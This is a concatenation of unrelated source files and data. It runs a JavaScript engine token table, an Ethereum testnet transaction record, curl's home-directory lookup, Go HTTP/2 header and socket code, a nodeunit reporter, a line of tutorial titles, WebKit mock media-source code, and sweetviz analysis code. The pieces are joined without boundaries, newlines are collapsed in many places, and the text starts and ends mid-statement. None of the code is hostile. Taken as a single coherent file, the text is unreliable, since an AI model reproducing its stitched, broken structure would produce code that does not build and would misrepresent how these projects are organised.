// Additional future reserved words in strict mode KEYWORD(tkIMPLEMENTS ,2, No, knopNone , No, knopNone , implements) KEYWORD(tkINTERFACE ,2, No, knopNone , No, knopNone , interface) KEYWORD(tkLET ,2, No, knopNone , No, knopNone , let) KEYWORD(tkPACKAGE ,2, No, knopNone , No, knopNone , package) KEYWORD(tkPRIVATE ,2, No, knopNone , No, knopNone , private) KEYWORD(tkPROTECTED ,2, No, knopNone , No, knopNone , protected) KEYWORD(tkPUBLIC ,2, No, knopNone , No, knopNone , public) KEYWORD(tkSTATIC ,2, No, knopNone , No, knopNone , static) S_KEYWORD(LEval ,3, eval) S_KEYWORD(LArguments ,3, arguments) S_KEYWORD(LTarget ,3, target) #undef KEYWORD #ifndef TOK_DCL #define TOK_DCL(tk,prec2,nop2,prec1,nop1) #endif //!TOK_DCL // The identifier token must follow the last identifier keyword TOK_DCL(tkID , No, knopNone , No, knopNone) // Non-operator non-identifier tokens TOK_DCL(tkSColon , No, knopNone , No, knopNone ) // ; TOK_DCL(tkRParen , No, knopNone , No, knopNone ) // ) TOK_DCL(tkRBrack , No, knopNone , No, knopNone ) // ] TOK_DCL(tkLCurly , No, knopNone , No, knopNone ) // { TOK_DCL(tkRCurly , No, knopNone , No, knopNone ) // } // Operator non-identifier tokens TOK_DCL(tkComma ,Cma, knopComma , No, knopNone ) // , TOK_DCL(tkDArrow ,Asg, knopFncDecl, No, knopNone ) // => TOK_DCL(tkAsg ,Asg, knopAsg , No, knopNone ) // = TOK_DCL(tkAsgAdd ,Asg, knopAsgAdd , No, knopNone ) // += TOK_DCL(tkAsgSub ,Asg, knopAsgSub , No, knopNone ) // -= TOK_DCL(tkAsgMul ,Asg, knopAsgMul , No, knopNone ) // *= TOK_DCL(tkAsgDiv ,Asg, knopAsgDiv , No, knopNone ) // /= TOK_DCL(tkAsgExpo ,Asg, knopAsgExpo, No, knopNone ) // **= TOK_DCL(tkAsgMod ,Asg, knopAsgMod , No, knopNone ) // %= TOK_DCL(tkAsgAnd ,Asg, knopAsgAnd , No, knopNone ) // &= TOK_DCL(tkAsgXor ,Asg, knopAsgXor , No, knopNone ) // ^= TOK_DCL(tkAsgOr ,Asg, knopAsgOr , No, knopNone ) // |= TOK_DCL(tkAsgLsh ,Asg, knopAsgLsh , No, knopNone ) // <<= TOK_DCL(tkAsgRsh ,Asg, knopAsgRsh , No, knopNone ) // >>= TOK_DCL(tkAsgRs2 ,Asg, knopAsgRs2 , No, knopNone ) // >>>= 
TOK_DCL(tkQMark     ,Que, knopQmark   , No, knopNone     ) // ?
TOK_DCL(tkColon     , No, knopNone    , No, knopNone     ) // :
TOK_DCL(tkLogOr     ,Lor, knopLogOr   , No, knopNone     ) // ||
TOK_DCL(tkLogAnd    ,Lan, knopLogAnd  , No, knopNone     ) // &&
TOK_DCL(tkOr        ,Bor, knopOr      , No, knopNone     ) // |
TOK_DCL(tkXor       ,Xor, knopXor     , No, knopNone     ) // ^
TOK_DCL(tkAnd       ,Ban, knopAnd     , No, knopNone     ) // &
TOK_DCL(tkEQ        ,Equ, knopEq      , No, knopNone     ) // ==
TOK_DCL(tkNE        ,Equ, knopNe      , No, knopNone     ) // !=
TOK_DCL(tkEqv       ,Equ, knopEqv     , No, knopNone     ) // ===
TOK_DCL(tkNEqv      ,Equ, knopNEqv    , No, knopNone     ) // !==
TOK_DCL(tkLT        ,Cmp, knopLt      , No, knopNone     ) // <
TOK_DCL(tkLE        ,Cmp, knopLe      , No, knopNone     ) // <=
TOK_DCL(tkGT        ,Cmp, knopGt      , No, knopNone     ) // >
TOK_DCL(tkGE        ,Cmp, knopGe      , No, knopNone     ) // >=
TOK_DCL(tkLsh       ,Shf, knopLsh     , No, knopNone     ) // <<
TOK_DCL(tkRsh       ,Shf, knopRsh     , No, knopNone     ) // >>
TOK_DCL(tkRs2       ,Shf, knopRs2     , No, knopNone     ) // >>>
TOK_DCL(tkAdd       ,Add, knopAdd     ,Uni, knopPos      ) // +
TOK_DCL(tkSub       ,Add, knopSub     ,Uni, knopNeg      ) // -
TOK_DCL(tkExpo      ,Expo, knopExpo   , No, knopNone     ) // **
TOK_DCL(tkStar      ,Mul, knopMul     , No, knopNone     ) // *
TOK_DCL(tkDiv       ,Mul, knopDiv     , No, knopNone     ) // /
TOK_DCL(tkPct       ,Mul, knopMod     , No, knopNone     ) // %
TOK_DCL(tkTilde     , No, knopNone    ,Uni, knopNot      ) // ~
TOK_DCL(tkBang      , No, knopNone    ,Uni, knopLogNot   ) // !
TOK_DCL(tkInc       , No, knopNone    ,Uni, knopIncPre   ) // ++
TOK_DCL(tkDec       , No, knopNone    ,Uni, knopDecPre   ) // --
TOK_DCL(tkEllipsis  , No, knopNone    ,Spr, knopEllipsis ) // ...
TOK_DCL(tkLParen    , No, knopNone    , No, knopNone     ) // (
TOK_DCL(tkLBrack    , No, knopNone    , No, knopNone     ) // [
TOK_DCL(tkDot       , No, knopNone    , No, knopNone     ) // .

// String template tokens
TOK_DCL(tkStrTmplBasic , No, knopNone , No, knopNone     ) // `...`
TOK_DCL(tkStrTmplBegin , No, knopNone , No, knopNone     ) // `...${
TOK_DCL(tkStrTmplMid   , No, knopNone , No, knopNone     ) // }...${
TOK_DCL(tkStrTmplEnd   , No, knopNone , No, knopNone     ) // }...`
// Note: tkStrTmplMid and tkStrTmplEnd tokens do not actually contain the opening '}' character.
// Since the scanner can't disambiguate a tkRCurly which is part of the expression, literal, or string template syntax,
// we check to make sure the token after parsing the expression is a tkRCurly and put the scanner into a string template
// scanning mode which will scan the string literal and search for the closing '${' or '`'.

TOK_DCL(tkComment   , No, knopNone, No, knopNone ) // Comment for syntax coloring
TOK_DCL(tkScanError , No, knopNone, No, knopNone ) // Error in syntax coloring

#undef TOK_DCL
{ "asset": { "uuid": "2783a9ff-d6f1-5c9e-bbab-3b74be91adb1", "name": "RopDAI", "decimal": 18, "ticker": "RopDAI", "networkId": "Ropsten", "contractAddress": "0xad6d458402f60fd3bd25163575031acdce07538d", "type": "erc20", "isCustom": true }, "baseAsset": { "uuid": "77de68da-ecd8-53ba-bbb5-8edb1c8e14d7", "ticker": "RopstenETH", "name": "Ropsten", "decimal": 18, "networkId": "Ropsten", "type": "base", "isCustom": false }, "hash": "0x13ca764cb3f852dc6b95118e32d5ff589fb9fccd987d0f7818d6baf3b1ae1a26", "from": "0xb2bb2b958AFa2e96dab3f3Ce7162b87daEa39017", "receiverAddress": "0xb2bb2b958AFa2e96dab3f3Ce7162b87daEa39017", "amount": "0.01", "to": "0xad6d458402f60fd3bd25163575031acdce07538d", "nonce": "7", "gasLimit": { "_hex": "0x7d3c" }, "gasPrice": { "_hex": "0x012a05f200" }, "data": "0xa9059cbb0000000000000000000000004d1f9d958afa2e96dab3f3ce7162b87daea39017000000000000000000000000000000000000000000000000002386f26fc10000", "value": { "_hex": "0x0" }, "status": "SUCCESS", "txType": "STANDARD", "blockNumber": 7990974, "timestamp": 1590734231, "gasUsed": { "_hex": "0x7d3c" }, "confirmations": 1 }
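The data field in the record above is ordinary ERC-20 transfer(address,uint256) calldata: a 4-byte selector followed by two 32-byte ABI words. A minimal decoding sketch using only the Python standard library (variable names are illustrative; the hex string is copied from the record):

# Decode the ERC-20 transfer() calldata from the record above.
# ABI layout: 4-byte selector, then two 32-byte words (recipient, amount).
data = ("0xa9059cbb"
        "0000000000000000000000004d1f9d958afa2e96dab3f3ce7162b87daea39017"
        "000000000000000000000000000000000000000000000000002386f26fc10000")

raw = bytes.fromhex(data[2:])
selector = raw[:4].hex()                  # 'a9059cbb' == transfer(address,uint256)
recipient = "0x" + raw[4:36][-20:].hex()  # an address is right-aligned in its 32-byte word
amount_wei = int.from_bytes(raw[36:68], "big")

print(selector)              # a9059cbb
print(recipient)             # 0x4d1f9d958afa2e96dab3f3ce7162b87daea39017
print(amount_wei / 10**18)   # 0.01 -- matches the record's "amount" field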
/***************************************************************************
 *                                  _   _ ____  _
 *  Project                     ___| | | |  _ \| |
 *                             / __| | | | |_) | |
 *                            | (__| |_| |  _ <| |___
 *                             \___|\___/|_| \_\_____|
 *
 * Copyright (C) 1998 - 2016, Daniel Stenberg, <[email protected]>, et al.
 *
 * This software is licensed as described in the file COPYING, which
 * you should have received as part of this distribution. The terms
 * are also available at https://curl.haxx.se/docs/copyright.html.
 *
 * You may opt to use, copy, modify, merge, publish, distribute and/or sell
 * copies of the Software, and permit persons to whom the Software is
 * furnished to do so, under the terms of the COPYING file.
 *
 * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
 * KIND, either express or implied.
 *
 ***************************************************************************/
#include "tool_setup.h"

#ifdef HAVE_PWD_H
#  include <pwd.h>
#endif

#include "tool_homedir.h"

#include "memdebug.h" /* keep this as LAST include */

static char *GetEnv(const char *variable, char do_expand)
{
  char *env = NULL;
#ifdef WIN32
  char buf1[1024], buf2[1024];
  DWORD rc;

  /* Don't use getenv(); it doesn't find variables added after the program
   * was started. Don't accept truncated results (i.e. rc >= sizeof(buf1)).
   */
  rc = GetEnvironmentVariableA(variable, buf1, sizeof(buf1));
  if(rc > 0 && rc < sizeof(buf1)) {
    env = buf1;
    variable = buf1;
  }
  if(do_expand && strchr(variable, '%')) {
    /* buf2 == variable if not expanded */
    rc = ExpandEnvironmentStringsA(variable, buf2, sizeof(buf2));
    if(rc > 0 && rc < sizeof(buf2) &&
       !strchr(buf2, '%'))    /* no vars still unexpanded */
      env = buf2;
  }
#else
  (void)do_expand;
  /* no length control */
  env = getenv(variable);
#endif
  return (env && env[0]) ? strdup(env) : NULL;
}

/* return the home directory of the current user as an allocated string */
char *homedir(void)
{
  char *home;

  home = GetEnv("CURL_HOME", FALSE);
  if(home)
    return home;

  home = GetEnv("HOME", FALSE);
  if(home)
    return home;

#if defined(HAVE_GETPWUID) && defined(HAVE_GETEUID)
  {
    struct passwd *pw = getpwuid(geteuid());

    if(pw) {
      home = pw->pw_dir;
      if(home && home[0])
        home = strdup(home);
      else
        home = NULL;
    }
  }
#endif /* PWD-stuff */
#ifdef WIN32
  home = GetEnv("APPDATA", TRUE);
  if(!home)
    home = GetEnv("%USERPROFILE%\\Application Data", TRUE); /* Normally only
                                                               on Win-2K/XP */
#endif /* WIN32 */
  return home;
}
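For quick reference, the precedence homedir() implements above (CURL_HOME, then HOME, then the password database, then the Windows fallbacks) can be restated compactly. A Python sketch of the same lookup order, purely illustrative and not part of curl:

import os

def homedir():
    # Same precedence as the C function above: CURL_HOME beats HOME,
    # which beats the passwd entry, which beats the Windows fallbacks.
    for var in ("CURL_HOME", "HOME"):
        value = os.environ.get(var)
        if value:
            return value
    if os.name == "posix":
        import pwd
        entry = pwd.getpwuid(os.geteuid())
        if entry.pw_dir:
            return entry.pw_dir
    # On Windows the C code falls back to APPDATA (with %VAR% expansion).
    return os.environ.get("APPDATA")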
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package http2

import (
	"net/http"
	"strings"

	"mosn.io/mosn/pkg/protocol"
	"mosn.io/mosn/pkg/types"
)

type HeaderMap struct {
	H http.Header
}

type ReqHeader struct {
	*HeaderMap
	Req *http.Request
}

type RspHeader struct {
	*HeaderMap
	Rsp *http.Response
}

func NewHeaderMap(header http.Header) *HeaderMap {
	h := new(HeaderMap)
	h.H = header
	return h
}

func NewReqHeader(req *http.Request) *ReqHeader {
	h := new(ReqHeader)
	h.Req = req
	h.HeaderMap = NewHeaderMap(h.Req.Header)
	return h
}

func NewRspHeader(rsp *http.Response) *RspHeader {
	h := new(RspHeader)
	h.Rsp = rsp
	h.HeaderMap = NewHeaderMap(h.Rsp.Header)
	return h
}

// Get value of key
func (h *HeaderMap) Get(key string) (value string, ok bool) {
	value = h.H.Get(key)
	if value == "" {
		return value, false
	}
	return value, true
}

// Set key-value pair in header map, the previous pair will be replaced if exists
func (h *HeaderMap) Set(key string, value string) {
	h.H.Set(key, value)
}

// Add value for given key.
// Multiple headers with the same key may be added with this function.
// Use Set for setting a single header for the given key.
func (h *HeaderMap) Add(key string, value string) {
	h.H.Add(key, value)
}

// Del delete pair of specified key
func (h *HeaderMap) Del(key string) {
	h.H.Del(key)
}

func (h *HeaderMap) Clone() types.HeaderMap {
	header := h.H
	h2 := make(http.Header, len(header))

	for k, vv := range header {
		vv2 := make([]string, len(vv))
		copy(vv2, vv)
		h2[k] = vv2
	}

	return NewHeaderMap(h2)
}

func (h *ReqHeader) Clone() types.HeaderMap {
	h2 := new(ReqHeader)
	h2.HeaderMap = h.HeaderMap.Clone().(*HeaderMap)

	h2.Req = new(http.Request)
	*h2.Req = *h.Req
	h2.Req.Header = h2.HeaderMap.H

	return h2
}

func (h *ReqHeader) Get(key string) (string, bool) {
	if len(key) > 0 && key[0] == ':' {
		switch key {
		case ":authority":
			return h.Req.Host, true
		case ":path":
			return h.Req.RequestURI, true
		case ":method":
			return h.Req.Method, true
		default:
			return "", false
		}
	}
	return h.HeaderMap.Get(key)
}

func (h *RspHeader) Clone() types.HeaderMap {
	h2 := new(RspHeader)
	h2.HeaderMap = h.HeaderMap.Clone().(*HeaderMap)

	h2.Rsp = new(http.Response)
	*h2.Rsp = *h.Rsp
	h2.Rsp.Header = h2.HeaderMap.H

	return h2
}

// Range calls f sequentially for each key and value present in the map.
// If f returns false, range stops the iteration.
func (h HeaderMap) Range(f func(key, value string) bool) { for k, v := range h.H { // stop if f return false if !f(k, v[0]) { break } } } func (h HeaderMap) ByteSize() uint64 { var size uint64 for k, v := range h.H { size += uint64(len(k) + len(v[0])) } return size } func EncodeHeader(header types.HeaderMap) http.Header { h := http.Header((make(map[string][]string))) header.Range(func(k, v string) bool { h.Add(k, v) return true }) return h } func DecodeHeader(header types.HeaderMap) types.HeaderMap { var in http.Header switch h := header.(type) { case *ReqHeader: in = h.H case *RspHeader: in = h.H case *HeaderMap: in = h.H default: return nil } out := make(map[string]string) for k, v := range in { out[strings.ToLower(k)] = strings.Join(v, ",") } return protocol.CommonHeader(out) }
// Copyright 2017 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build linux,!s390x,!386 package socket import ( "syscall" "unsafe" ) func probeProtocolStack() int { var p uintptr return int(unsafe.Sizeof(p)) } func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { n, _, errno := syscall.Syscall6(sysRECVMMSG, s, uintptr(unsafe.Pointer(&hs[0])), uintptr(len(hs)), uintptr(flags), 0, 0) return int(n), errnoErr(errno) } func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { n, _, errno := syscall.Syscall6(sysSENDMMSG, s, uintptr(unsafe.Pointer(&hs[0])), uintptr(len(hs)), uintptr(flags), 0, 0) return int(n), errnoErr(errno) }
/*! * Nodeunit * Copyright (c) 2010 Caolan McMahon * MIT Licensed */ /** * Module dependencies */ var nodeunit = require('../nodeunit'), utils = require('../utils'), fs = require('fs'), path = require('path'), AssertionError = require('assert').AssertionError; /** * Reporter info string */ exports.info = "Skip passed tests output"; /** * Run all tests within each module, reporting the results to the command-line. * * @param {Array} files * @api public */ exports.run = function (files, options, callback) { if (!options) { // load default options var content = fs.readFileSync( __dirname + '/../../bin/nodeunit.json', 'utf8' ); options = JSON.parse(content); } var error = function (str) { return options.error_prefix + str + options.error_suffix; }; var ok = function (str) { return options.ok_prefix + str + options.ok_suffix; }; var bold = function (str) { return options.bold_prefix + str + options.bold_suffix; }; var assertion_message = function (str) { return options.assertion_prefix + str + options.assertion_suffix; }; var start = new Date().getTime(); var paths = files.map(function (p) { return path.join(process.cwd(), p); }); nodeunit.runFiles(paths, { testspec: options.testspec, testFullSpec: options.testFullSpec, moduleStart: function (name) { console.log('\n' + bold(name)); }, testDone: function (name, assertions) { if (assertions.failures()) { console.log(error('✖ ' + name) + '\n'); assertions.forEach(function (a) { if (a.failed()) { a = utils.betterErrors(a); if (a.error instanceof AssertionError && a.message) { console.log( 'Assertion Message: ' + assertion_message(a.message) ); } console.log(a.error.stack + '\n'); } }); } }, moduleDone: function (name, assertions) { if (!assertions.failures()) { console.log('✔ all tests passed'); } else { console.log(error('✖ some tests failed')); } }, done: function (assertions) { var end = new Date().getTime(); var duration = end - start; if (assertions.failures()) { console.log( '\n' + bold(error('FAILURES: ')) + assertions.failures() + '/' + assertions.length + ' assertions failed (' + assertions.duration + 'ms)' ); } else { console.log( '\n' + bold(ok('OK: ')) + assertions.length + ' assertions (' + assertions.duration + 'ms)' ); } if (callback) callback(assertions.failures() ? new Error('We have got test failures.') : undefined); } }); };
How to analyse a server's log files Intro to `sed` Using `lynx` to convert HTML to text Image manipulation using `convert` Wrap text with `fold`
/* * Copyright (C) 2013-2014 Apple Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "config.h" #include "MockSourceBufferPrivate.h" #if ENABLE(MEDIA_SOURCE) #include "MediaDescription.h" #include "MediaPlayer.h" #include "MediaSample.h" #include "MockBox.h" #include "MockMediaPlayerMediaSource.h" #include "MockMediaSourcePrivate.h" #include "MockTracks.h" #include "SourceBufferPrivateClient.h" #include <map> #include <runtime/ArrayBuffer.h> #include <wtf/PrintStream.h> namespace WebCore { class MockMediaSample final : public MediaSample { public: static RefPtr<MockMediaSample> create(const MockSampleBox& box) { return adoptRef(new MockMediaSample(box)); } virtual ~MockMediaSample() { } private: MockMediaSample(const MockSampleBox& box) : m_box(box) , m_id(String::format("%d", box.trackID())) { } MediaTime presentationTime() const override { return m_box.presentationTimestamp(); } MediaTime decodeTime() const override { return m_box.decodeTimestamp(); } MediaTime duration() const override { return m_box.duration(); } AtomicString trackID() const override { return m_id; } size_t sizeInBytes() const override { return sizeof(m_box); } SampleFlags flags() const override; PlatformSample platformSample() override; FloatSize presentationSize() const override { return FloatSize(); } void dump(PrintStream&) const override; void offsetTimestampsBy(const MediaTime& offset) override { m_box.offsetTimestampsBy(offset); } void setTimestamps(const MediaTime& presentationTimestamp, const MediaTime& decodeTimestamp) override { m_box.setTimestamps(presentationTimestamp, decodeTimestamp); } unsigned generation() const { return m_box.generation(); } MockSampleBox m_box; AtomicString m_id; }; MediaSample::SampleFlags MockMediaSample::flags() const { unsigned flags = None; if (m_box.flags() & MockSampleBox::IsSync) flags |= IsSync; return SampleFlags(flags); } PlatformSample MockMediaSample::platformSample() { PlatformSample sample = { PlatformSample::MockSampleBoxType, { &m_box } }; return sample; } void MockMediaSample::dump(PrintStream& out) const { out.print("{PTS(", presentationTime(), "), DTS(", decodeTime(), "), duration(", duration(), "), flags(", (int)flags(), "), generation(", generation(), ")}"); } class MockMediaDescription final : public MediaDescription { public: static 
RefPtr<MockMediaDescription> create(const MockTrackBox& box) { return adoptRef(new MockMediaDescription(box)); } virtual ~MockMediaDescription() { } AtomicString codec() const override { return m_box.codec(); } bool isVideo() const override { return m_box.kind() == MockTrackBox::Video; } bool isAudio() const override { return m_box.kind() == MockTrackBox::Audio; } bool isText() const override { return m_box.kind() == MockTrackBox::Text; } protected: MockMediaDescription(const MockTrackBox& box) : m_box(box) { } MockTrackBox m_box; }; RefPtr<MockSourceBufferPrivate> MockSourceBufferPrivate::create(MockMediaSourcePrivate* parent) { return adoptRef(new MockSourceBufferPrivate(parent)); } MockSourceBufferPrivate::MockSourceBufferPrivate(MockMediaSourcePrivate* parent) : m_mediaSource(parent) , m_client(0) { } MockSourceBufferPrivate::~MockSourceBufferPrivate() { } void MockSourceBufferPrivate::setClient(SourceBufferPrivateClient* client) { m_client = client; } void MockSourceBufferPrivate::append(const unsigned char* data, unsigned length) { m_inputBuffer.append(data, length); SourceBufferPrivateClient::AppendResult result = SourceBufferPrivateClient::AppendSucceeded; while (m_inputBuffer.size() && result == SourceBufferPrivateClient::AppendSucceeded) { RefPtr<ArrayBuffer> buffer = ArrayBuffer::create(m_inputBuffer.data(), m_inputBuffer.size()); size_t boxLength = MockBox::peekLength(buffer.get()); if (boxLength > buffer->byteLength()) break; String type = MockBox::peekType(buffer.get()); if (type == MockInitializationBox::type()) { MockInitializationBox initBox = MockInitializationBox(buffer.get()); didReceiveInitializationSegment(initBox); } else if (type == MockSampleBox::type()) { MockSampleBox sampleBox = MockSampleBox(buffer.get()); didReceiveSample(sampleBox); } else result = SourceBufferPrivateClient::ParsingFailed; m_inputBuffer.remove(0, boxLength); } if (m_client) m_client->sourceBufferPrivateAppendComplete(this, result); } void MockSourceBufferPrivate::didReceiveInitializationSegment(const MockInitializationBox& initBox) { if (!m_client) return; SourceBufferPrivateClient::InitializationSegment segment; segment.duration = initBox.duration(); for (auto it = initBox.tracks().begin(); it != initBox.tracks().end(); ++it) { const MockTrackBox& trackBox = *it; if (trackBox.kind() == MockTrackBox::Video) { SourceBufferPrivateClient::InitializationSegment::VideoTrackInformation info; info.track = MockVideoTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.videoTracks.append(info); } else if (trackBox.kind() == MockTrackBox::Audio) { SourceBufferPrivateClient::InitializationSegment::AudioTrackInformation info; info.track = MockAudioTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.audioTracks.append(info); } else if (trackBox.kind() == MockTrackBox::Text) { SourceBufferPrivateClient::InitializationSegment::TextTrackInformation info; info.track = MockTextTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.textTracks.append(info); } } m_client->sourceBufferPrivateDidReceiveInitializationSegment(this, segment); } void MockSourceBufferPrivate::didReceiveSample(const MockSampleBox& sampleBox) { if (!m_client) return; m_client->sourceBufferPrivateDidReceiveSample(this, MockMediaSample::create(sampleBox)); } void MockSourceBufferPrivate::abort() { } void MockSourceBufferPrivate::removedFromMediaSource() { if (m_mediaSource) 
m_mediaSource->removeSourceBuffer(this); } MediaPlayer::ReadyState MockSourceBufferPrivate::readyState() const { return m_mediaSource ? m_mediaSource->player()->readyState() : MediaPlayer::HaveNothing; } void MockSourceBufferPrivate::setReadyState(MediaPlayer::ReadyState readyState) { if (m_mediaSource) m_mediaSource->player()->setReadyState(readyState); } void MockSourceBufferPrivate::setActive(bool isActive) { if (m_mediaSource) m_mediaSource->sourceBufferPrivateDidChangeActiveState(this, isActive); } void MockSourceBufferPrivate::enqueueSample(PassRefPtr<MediaSample> sample, AtomicString) { if (!m_mediaSource || !sample) return; PlatformSample platformSample = sample->platformSample(); if (platformSample.type != PlatformSample::MockSampleBoxType) return; MockSampleBox* box = platformSample.sample.mockSampleBox; if (!box) return; m_mediaSource->incrementTotalVideoFrames(); if (box->isCorrupted()) m_mediaSource->incrementCorruptedFrames(); if (box->isDropped()) m_mediaSource->incrementDroppedFrames(); if (box->isDelayed()) m_mediaSource->incrementTotalFrameDelayBy(MediaTime(1, 1)); } bool MockSourceBufferPrivate::hasVideo() const { if (!m_client) return false; return m_client->sourceBufferPrivateHasVideo(this); } bool MockSourceBufferPrivate::hasAudio() const { if (!m_client) return false; return m_client->sourceBufferPrivateHasAudio(this); } MediaTime MockSourceBufferPrivate::fastSeekTimeForMediaTime(const MediaTime& time, const MediaTime& negativeThreshold, const MediaTime& positiveThreshold) { if (m_client) return m_client->sourceBufferPrivateFastSeekTimeForMediaTime(this, time, negativeThreshold, positiveThreshold); return time; } void MockSourceBufferPrivate::seekToTime(const MediaTime& time) { if (m_client) m_client->sourceBufferPrivateSeekToTime(this, time); } } #endif
from sweetviz.config import config from sweetviz.sv_types import NumWithPercent, FeatureType, FeatureToProcess from sweetviz.graph_cat import GraphCat import sweetviz.sv_html as sv_html import sweetviz.utils as utils from sweetviz.sv_types import OTHERS_GROUPED def do_detail_categorical(to_process: FeatureToProcess, updated_dict: dict): updated_dict["detail"] = dict() detail = updated_dict["detail"] # Compute COUNT stats (i.e. below graph) # ---------------------------------------------------------------------------------------------- detail["full_count"] = [] # To get percentages num_values = updated_dict["base_stats"]["num_values"].number if to_process.compare_counts is not None: num_values_compare = updated_dict["compare"]["base_stats"]["num_values"].number category_counts = utils.get_clamped_value_counts(to_process.source_counts["value_counts_without_nan"], \ config["Graphs"].getint("detail_graph_max_categories")) # Iterate through ALL VALUES and get stats total_num_compare = 0 max_abs_value = 0 for item in category_counts.iteritems(): row = dict() row["name"] = item[0] row["count"] = NumWithPercent(item[1], num_values) # Defaults to no comparison or target row["count_compare"] = None row["target_stats"] = None row["target_stats_compare"] = None row["is_total"] = None if to_process.source_target is not None: # HAS TARGET # TODO: OPTIMIZE: CACHE FROM GRAPH? if row["name"] == OTHERS_GROUPED: this_value_target_only = to_process.source_target[ ~to_process.source.isin(category_counts.keys())] else: this_value_target_only = to_process.source_target[to_process.source == row["name"]] if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # If value is only present in compared if len(this_value_target_only) > 0: count_this_value_target_only = float(this_value_target_only.count()) count_true = this_value_target_only.sum() row["target_stats"] = NumWithPercent(count_true, count_this_value_target_only) else: # None will be correctly interpreted by our display, not nan row["target_stats"] = None elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # If value is only present in compared if len(this_value_target_only) > 0: row["target_stats"] = NumWithPercent(this_value_target_only.mean(), 1.0) max_abs_value = max(max_abs_value, row["target_stats"].number) else: # None will be correctly interpreted by our display, not nan row["target_stats"] = None if to_process.compare_counts is not None: # HAS COMPARE... if row["name"] in to_process.compare_counts["value_counts_without_nan"].index: # ...and value exists in COMPARE matching = to_process.compare_counts["value_counts_without_nan"][row["name"]] row["count_compare"] = NumWithPercent(matching, num_values_compare) if to_process.compare_target is not None: # TODO: OPTIMIZE: CACHE FROM GRAPH? 
if row["name"] == OTHERS_GROUPED: this_value_target_only = to_process.compare_target[ ~to_process.compare.isin(category_counts.keys())] else: this_value_target_only = to_process.compare_target[to_process.compare == row["name"]] # HAS COMPARE-TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: if len(this_value_target_only) > 0: count_this_value_target_only = float(this_value_target_only.count()) count_true = this_value_target_only.sum() row["target_stats_compare"] = NumWithPercent(count_true, count_this_value_target_only) else: # None will be correctly interpreted by our display, not nan row["target_stats_compare"] = None elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: if len(this_value_target_only) > 0: row["target_stats_compare"] = NumWithPercent(this_value_target_only.mean(), 1.0) max_abs_value = max(max_abs_value, row["target_stats_compare"].number) else: # None will be correctly interpreted by our display, not nan row["target_stats_compare"] = None detail["full_count"].append(row) detail["max_range"] = max_abs_value # "ALL" row # ----------------------------------------------- row = dict() row["name"] = "ALL" row["count"] = NumWithPercent(num_values, num_values) # Defaults to no comparison or target row["count_compare"] = None row["target_stats"] = None row["target_stats_compare"] = None row["is_total"] = True if to_process.source_target is not None: # HAS TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # TODO: OPTIMIZE: CACHE FROM GRAPH? count_this_value_target_only = float(to_process.source_target.count()) count_true = to_process.source_target.sum() row["target_stats"] = NumWithPercent(count_true, count_this_value_target_only) elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # TODO: OPTIMIZE: CACHE FROM GRAPH? row["target_stats"] = NumWithPercent(to_process.source_target.mean(), 1.0) if to_process.compare_counts is not None: row["count_compare"] = NumWithPercent(num_values_compare, num_values_compare) if to_process.compare_target is not None: # HAS COMPARE-TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # TODO: OPTIMIZE: CACHE FROM GRAPH? count_this_value_target_only = float(to_process.compare_target.count()) count_true = to_process.compare_target.sum() row["target_stats_compare"] = NumWithPercent(count_true, count_this_value_target_only) elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # TODO: OPTIMIZE: CACHE FROM GRAPH? row["target_stats_compare"] = NumWithPercent(to_process.compare_target.mean(), 1.0) detail["full_count"].append(row) return def analyze(to_process: FeatureToProcess, feature_dict: dict): compare_dict = feature_dict.get("compare") feature_dict["stats"] = dict() if compare_dict: compare_dict["stats"] = dict() do_detail_categorical(to_process, feature_dict) feature_dict["minigraph"] = GraphCat("mini", to_process) feature_dict["detail_graphs"] = list() feature_dict["detail_graphs"].append(GraphCat("detail", to_process)) if to_process.is_target(): feature_dict["html_summary"] = sv_html.generate_html_summary_target_cat(feature_dict, compare_dict) else: 